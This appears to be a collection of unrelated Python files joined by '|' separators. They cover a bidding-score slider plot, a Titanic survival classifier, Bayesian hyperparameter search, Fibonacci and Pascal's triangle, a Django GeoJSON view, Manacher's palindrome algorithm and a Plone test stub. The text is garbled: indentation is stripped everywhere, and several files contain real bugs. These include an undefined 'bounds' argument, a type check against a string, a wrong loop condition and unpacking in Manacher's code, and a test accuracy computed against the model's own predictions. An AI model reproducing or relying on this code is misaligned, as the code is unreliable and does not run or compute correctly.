temp[i] *= -0.8
ret = (100-temp)*0.6
return ret
my_bid = 216
my_bid_cnt = 3
op_bid_start = 180.0
op_bid_end = 220.0
op_bid_cnt = 2
bid_step = 0.1
alpha = 2
my_offer = 215
op_offer = 180
x,y = calc_base(my_bid,my_bid_cnt,op_bid_start,op_bid_end,op_bid_cnt,bid_step,alpha)
z = calc_score(my_offer,y)
z0 = calc_score(x,y)
#plt
fig = plt.figure()
ax = fig.add_subplot(311)
bx = fig.add_subplot(312)
ax.set_xlabel('op avg bid')
ax.set_ylabel('score')
lineax0, = ax.plot(x,z,label='my_score')
lineax1, = ax.plot(x,z0,label='op_score')
ax.grid()
ax.legend()
bx.set_title("my:%0.2f@%d, op_cnt:%0.2f@%d" % (my_bid,my_bid_cnt,op_offer,op_bid_cnt))
bx.set_xlabel('op avg bid')
bx.set_ylabel('base')
linebx0, = bx.plot(x,y,label='call',color='red')
bx.grid()
target_bid = Slider(plt.axes([0.15, 0.01, 0.7, 0.02]), 'my_offer', valmin=op_bid_start, valmax=op_bid_end, valinit=216.67)
av_bid = Slider(plt.axes([0.15, 0.035, 0.7, 0.02]), 'my_avg_bid', valmin=op_bid_start, valmax=op_bid_end, valinit=214.0)
salpha = Slider(plt.axes([0.15, 0.06, 0.7, 0.02]), 'my_avg_bid', valmin=0.8, valmax=2, valinit= 0.8)
def update(event):
fig.canvas.draw_idle()
x,y = calc_base(av_bid.val,my_bid_cnt,op_bid_start,op_bid_end,op_bid_cnt,bid_step,salpha.val)
z = calc_score(target_bid.val,y)
z0 = calc_score(x,y)
bx.set_title("my:%0.2f@%d, op_cnt:%d" % (av_bid.val,my_bid_cnt,op_bid_cnt))
lineax0.set_ydata(z)
lineax1.set_ydata(z0)
ax.set_ylim(np.min([z,z0]),np.max([z,z0]))
linebx0.set_ydata(y)
bx.set_ylim(np.min(y),np.max(y))
print(np.argmax(z)*bid_step+x[0])
target_bid.on_changed(update)
av_bid.on_changed(update)
salpha.on_changed(update)
plt.show()
|
def sort_array(source_array):
odd = []
for i in range(len(source_array)):
if source_array[i] % 2 == 1:
odd.append(source_array[i])
source_array[i] = "n"
odd.sort()
index = 0
for v in range(len(source_array)):
if source_array[v] == "n":
source_array[v] = odd[index]
index += 1
return source_array
|
import modelClass
#from bayes_opt import BayesianOptimization
import GPyOpt
def main():
dataModel = modelClass.modelClass()
dataModel.loadDataSequence()
domain = [{'name': 'nCNN','type':'discrete','domain':tuple(range(1,6))},
{'name': 'nDense','type':'discrete','domain':tuple(range(0,3))},
{'name': 'nEmbedding','type':'discrete','domain':tuple(range(5,200))},
{'name': 'nCNNFilters','type':'discrete','domain':tuple(range(2,1000))},
{'name': 'nNNFilters','type':'discrete','domain':tuple(range(3,1000))},
{'name': 'nKernel','type':'discrete','domain':tuple(range(1,4))},
{'name': 'nStrides','type':'discrete','domain':tuple(range(1,2))},
{'name': 'poolSize','type':'discrete','domain':tuple(range(1,2))}]
optimizer = GPyOpt.methods.BayesianOptimization(
dataModel.optimizeCNN,
bounds
)
max_iter = 20
optimizer.run_optimization(max_iter)
print(optimizer.x_opt)
if __name__ == "__main__":
main()
|
import pandas as pd
import numpy as np
import os
# Import models
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
## Read in the data, select the columns of interest
## All Columns == 'PassengerId', 'Pclass', 'Name', 'Sex', 'Age', 'SibSp', 'Parch', 'Ticket', 'Fare', 'Cabin', 'Embarked'
test_data = pd.read_csv('test.csv',
usecols = ['PassengerId',
'Pclass',
'Sex',
'Age',
'SibSp',
'Parch',
'Fare']
)
train_data = pd.read_csv('train.csv',
usecols = ['PassengerId',
'Survived',
'Pclass',
'Sex',
'Age',
'SibSp',
'Parch',
'Fare']
)
# Does randomising the data make any difference?
test_data = test_data.sample(frac=1).reset_index(drop=True)
train_data = train_data.sample(frac=1).reset_index(drop=True)
## Preprocessing the data, ensure values are usable and remove NaN values
train_data['Sex'] = train_data['Sex'].map({'female':0,'male':1})
test_data['Sex'] = test_data['Sex'].map({'female':0,'male':1})
age_mean_train = train_data['Age'].mean()
age_mean_test = test_data['Age'].mean()
train_data['Age'].fillna(age_mean_train,
inplace=True)
test_data['Age'].fillna(age_mean_test,
inplace=True)
train_data.loc[(train_data['Age'] < 16),'Age_cat'] = 'C'
train_data.loc[(train_data['Age'] >= 16),'Age_cat'] = 'A'
#train_data.loc[(train_data['Age'].isnull()),'Age_cat'] = 'U'
test_data.loc[(test_data['Age'] < 16),'Age_cat'] = 'C'
test_data.loc[(test_data['Age'] >= 16),'Age_cat'] = 'A'
#test_data.loc[(test_data['Age'].isnull()),'Age_cat'] = 'U'
train_data.drop(columns='Age',
inplace=True)
test_data.drop(columns='Age',
inplace=True)
train_data.loc[(train_data['Fare'].isnull()), 'Fare'] = 0
test_data.loc[(test_data['Fare'].isnull()), 'Fare'] = 0
train_data = pd.get_dummies(train_data,
columns=['Age_cat'],
prefix = ['Age_cat'])
test_data = pd.get_dummies(test_data,
columns=['Age_cat'],
prefix = ['Age_cat'])
## Split the data to train and test data and convert to array
X_train = train_data.drop(columns=['Survived', 'PassengerId']).to_numpy()
y_train = train_data['Survived'].to_numpy()
X_test = test_data.drop(columns='PassengerId').to_numpy()
## Decision Tree
dtc = DecisionTreeClassifier()
model = dtc.fit(X_train, y_train)
dtc_y_pred = model.predict(X_test)
dtc_y_pred_df = pd.DataFrame(dtc_y_pred).rename(columns={0:'Survived'})
print(f'Accuracy of DT classifier on training set: {model.score(X_train, y_train):.2f}')
print(f'Accuracy of DT classifier on test set: {model.score(X_test, dtc_y_pred):.2f}')
result = test_data.merge(dtc_y_pred_df, how = 'left', left_index = True, right_index = True)
submission = result[['PassengerId', 'Survived']].to_csv('result.csv', index = False)
|
#!/usr/bin/env python
def fib(x):
if type(x) != 'int':
raise "Integer required"
if x < 0:
raise "Negative values are not allowed"
if x in [0, 1]:
return 1
return fib(x - 1) + fib(x - 2)
def iter_fib(x):
prev = [0, 0]
for i in xrange(0, x):
if i == 0:
val = 1
else:
val = sum(prev)
print i, val
prev = [prev[1], val]
def iter_pas_tr(x):
for i in xrange(x):
if i == 0:
val = [1]
prev = [1]
else:
v1 = [0] + prev
v2 = prev + [0]
val = v1
for j in xrange(len(prev) + 1):
val[j] = v1[j] + v2[j]
prev = val
print i, val
iter_fib(40)
iter_pas_tr(15)
|
from django.views.generic import TemplateView
from django.shortcuts import render
from django.core.serializers import serialize
from django.http import HttpResponse
from .models import Stations
class HomePageView(TemplateView):
template_name = 'stations/index.html'
def stations_dataset(request):
stations = serialize('geojson', Stations.objects.all())
return HttpResponse(stations, content_type='json')
|
from _typeshed import Incomplete
def maximal_independent_set(
G, nodes: Incomplete | None = None, seed: Incomplete | None = None
): ...
|
# -*- coding: utf-8 -*-
class Solution:
def countSubstrings(self, s):
return sum((el + 1) // 2 for el in self.manachersAlgorithm(s))
def manachersAlgorithm(self, s):
c, r = 0, 0
s = "^#" + "#".join(s) + "#$"
p = [0] * len(s)
for i in range(1, len(s) - 1):
if i < r:
p[i] = min(r - i, p[2 * c - i])
while s[i + 1 + p[i]] == s[i - 1 - p[i]]:
p[i] += 1
if i + p[i] < r:
c, r = i + p[i]
return p
if __name__ == "__main__":
solution = Solution()
assert 3 == solution.countSubstrings("abc")
assert 6 == solution.countSubstrings("aaa")
|
# -*- coding:utf-8 -*-
from zope.interface import implements, Interface
from zope.component import getUtility, getMultiAdapter
from sc.newsletter.creator.tests.base import TestCase
from Products.PloneTestCase.setup import default_user
from DateTime import DateTime
class DummyEvent(object):
implements(IObjectEvent)
def __init__(self, object):
self.object = object
class TestPackage(TestCase):
def afterSetUp(self):
self.loginAsPortalOwner()
# Create objects to be used in test
self.portal.invokeFactory('Folder', 'foo')
def testSomething(self):
self.assertEquals(1, 1)
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestPackage))
return suite
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.